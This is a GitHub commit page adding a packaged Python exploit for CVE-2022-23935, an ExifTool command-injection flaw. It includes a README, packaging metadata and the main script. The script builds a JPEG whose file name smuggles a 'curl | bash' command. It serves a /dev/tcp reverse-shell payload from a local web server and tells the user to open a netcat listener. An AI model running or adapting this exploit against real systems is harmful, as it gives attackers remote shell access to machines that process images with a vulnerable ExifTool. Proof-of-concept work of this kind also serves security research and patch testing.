Implementation 🏴‍☠️

BKreisel · Feb 10, 2023 · 94bfbfd · 94bfbfd
1 parent 9f228f7
commit 94bfbfd
Show file tree

Hide file tree

Showing 4 changed files with 153 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -1,2 +1,34 @@
 # CVE-2022-23935
 🐍 Python Exploit for CVE-2022-23935
+
+Staged Reverse Shell Payload Generator for CVE-2022-23935
+
+## Example
+```
+cve-2022-23935 10.10.16.3 44444
+```
+## Usage
+```bash
+usage: cve-2022-23935 [-h] [-l SERVER_PORT] [-s SHELL] ip port
+
+positional arguments:
+  ip                    IP Address/Host for Callback
+  port                  Port Number for Callback
+
+options:
+  -h, --help            show this help message and exit
+  -l SERVER_PORT, --listen SERVER_PORT
+                        Port Number for Server Listen
+  -s SHELL, --shell SHELL
+                        Remote Shell
+
+```
+
+## Installation
+```bash
+python3 -m pip install cve-2022-23935-1.0.0-py3-none-any.whl
+```
+[Download Latest Release](https://github.com/BKreisel/sqlmap-websocket-proxy/releases/download/1.0.0/cve-2022-23935-1.0.0-py3-none-any.whl)
+
+## Demo
+[![demo](https://asciinema.org/a/558936.svg)](https://asciinema.org/a/558936?autoplay=1)
diff --git a/pyproject.toml b/pyproject.toml
@@ -0,0 +1,29 @@
+[build-system]
+requires = ["setuptools>=61.0"]
+build-backend = "setuptools.build_meta"
+
+[project]
+name = "cve-2022-23935"
+version = "1.0.0"
+authors = [
+  { name="Brandon Kreisel", email="BKreisel@users.noreply.github.com" },
+]
+description = "Python Exploit for CVE-2022-23935 (ExifTool Command Injection)"
+readme = "README.md"
+requires-python = ">=3.8"
+classifiers = [
+    "Programming Language :: Python :: 3",
+    "License :: OSI Approved :: MIT License",
+    "Operating System :: OS Independent",
+]
+
+dependencies = [
+    "rich",
+]
+
+[project.scripts]
+cve-2022-23935 = "cve_2022_23935.main:cli"
+
+[project.urls]
+"Homepage" = "https://github.com/BKreisel/CVE-2022-23935"
+"Bug Tracker" = "https://github.com/BKreisel/CVE-2022-23935/issues"
diff --git a/src/cve_2022_23935/__init__.py b/src/cve_2022_23935/__init__.py
diff --git a/src/cve_2022_23935/main.py b/src/cve_2022_23935/main.py
@@ -0,0 +1,92 @@
+import argparse
+import rich
+import socketserver
+import sys
+from functools import partial
+from http.server import SimpleHTTPRequestHandler
+
+ASCII_ART = """
+
+░█████╗░██╗░░░██╗███████╗░░░░░░██████╗░░█████╗░██████╗░██████╗░░░░░░░██████╗░██████╗░░█████╗░██████╗░███████╗
+██╔══██╗██║░░░██║██╔════╝░░░░░░╚════██╗██╔══██╗╚════██╗╚════██╗░░░░░░╚════██╗╚════██╗██╔══██╗╚════██╗██╔════╝
+██║░░╚═╝╚██╗░██╔╝█████╗░░█████╗░░███╔═╝██║░░██║░░███╔═╝░░███╔═╝█████╗░░███╔═╝░█████╔╝╚██████║░█████╔╝██████╗░
+██║░░██╗░╚████╔╝░██╔══╝░░╚════╝██╔══╝░░██║░░██║██╔══╝░░██╔══╝░░╚════╝██╔══╝░░░╚═══██╗░╚═══██║░╚═══██╗╚════██╗
+╚█████╔╝░░╚██╔╝░░███████╗░░░░░░███████╗╚█████╔╝███████╗███████╗░░░░░░███████╗██████╔╝░█████╔╝██████╔╝██████╔╝
+░╚════╝░░░░╚═╝░░░╚══════╝░░░░░░╚══════╝░╚════╝░╚══════╝╚══════╝░░░░░░╚══════╝╚═════╝░░╚════╝░╚═════╝░╚═════╝░
+PoC for [bold yellow]CVE-2022-23935[/bold yellow] - ExifTool Version < [bold yellow]12.38[/bold yellow]
+"""
+
+# Smallest Possible valid JPEG
+# https://gist.github.com/scotthaleen/32f76a413e0dfd4b4d79c2a534d49c0b
+JPEG_BYTES = b"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00\xFF\xDB\x00" \
+             b"\x43\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" \
+             b"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" \
+             b"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xC2\x00" \
+             b"\x0B\x08\x00\x01\x00\x01\x01\x01\x11\x00\xFF\xC4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00" \
+             b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xDA\x00\x08\x01\x01\x00\x01\x3F\x10"
+
+FILENAME_FMT = "curl {ip}:{port} | {shell} |"
+REVERSE_SHELL_FMT = "{shell} -i 5<> /dev/tcp/{ip}/{port} 0<&5 1>&5 2>&5"
+
+# ---------------------------------------------------------------------------------------------------------------------
+class WebHandler(SimpleHTTPRequestHandler):
+    # -----------------------------------------------------------------------------------------------------------------
+    def __init__(self, payload: str, *args, **kwargs):
+        self.payload = payload
+        super().__init__(*args, **kwargs)
+    # -----------------------------------------------------------------------------------------------------------------
+    def do_GET(self):
+        success("Got Request. Sent Payload 🏴‍☠️")
+        self.send_response(200)
+        self.end_headers()
+        self.wfile.write(self.payload.encode())
+        sys.exit(0)
+
+    # -----------------------------------------------------------------------------------------------------------------
+    def log_message(self, format, *args):
+        pass
+
+# ---------------------------------------------------------------------------------------------------------------------
+def error(txt: str):
+    rich.print(f"[red][-] Error: [/red]{txt}")
+    sys.exit(1)
+
+# ---------------------------------------------------------------------------------------------------------------------
+def status(txt: str, prefix=""):
+    rich.print(prefix + f"[blue][*][/blue] {txt}")
+
+# ---------------------------------------------------------------------------------------------------------------------
+def success(txt: str, prefix=""):
+    rich.print(prefix + f"[green][+][/green] {txt}")
+
+# ---------------------------------------------------------------------------------------------------------------------
+def cli():
+    parser = argparse.ArgumentParser()
+    parser.add_argument("ip", help="IP Address/Host for Callback")
+    parser.add_argument('port', help="Port Number for Callback")
+    parser.add_argument('-l', '--listen', dest="server_port", help="Port Number for Server Listen", default=55555)
+    parser.add_argument('-s', '--shell', default="bash", help="Remote Shell")
+    args = parser.parse_args()
+    rich.print(ASCII_ART)
+
+    filename = FILENAME_FMT.format(shell=args.shell, ip=args.ip, port=args.server_port)
+    payload = REVERSE_SHELL_FMT.format(shell=args.shell, ip=args.ip, port=args.port)
+
+    status(f"Creating File: \"{filename}\"")
+
+    with open(filename, "wb") as fd:
+        fd.write(JPEG_BYTES)
+
+    success("DONE.")
+    status(f"Use Listener:  [bold cyan]nc -nvlp {args.port} [/bold cyan]")
+
+    try:
+        handler = partial(WebHandler, payload)
+        with socketserver.TCPServer(("", args.server_port), handler) as httpd:    
+            status(f"Server Started on {args.server_port} (Ctrl+C to stop)\n")
+            httpd.serve_forever()
+    except KeyboardInterrupt:
+        status("Quitting...")
+        sys.exit(0)
+    except Exception as e:
+        error(f"Exception: {e}")